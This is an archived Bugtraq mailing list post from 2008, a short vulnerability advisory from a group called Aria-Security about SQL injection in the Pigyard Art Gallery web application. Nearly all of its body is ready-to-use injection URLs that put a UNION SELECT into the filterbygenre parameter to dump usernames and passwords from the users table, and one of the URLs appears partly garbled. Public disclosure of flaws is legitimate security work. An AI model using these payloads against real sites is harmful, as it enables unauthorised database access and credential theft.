Bugtraq mailing list archives
Pigyard Art Gallery Multiple SQL Injection
From: No-Reply () Aria-Security net
Date: 25 Feb 2008 01:11:41 -0000
Aria-Security Team, http://Aria-Security.net ------------------------------- Shout Outs: AurA, imm02tal, iM4N, Kinglet, Vendor: Pigyard Art Gallery Multiple SQL Injection This is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181) Original Link: http://forum.aria-security.net/showthread.php?p=1474 module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/* module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/* Regards, The-0utl4w Credits Goes To Aria-Security.Net
Current thread:
- Pigyard Art Gallery Multiple SQL Injection No-Reply (Feb 25)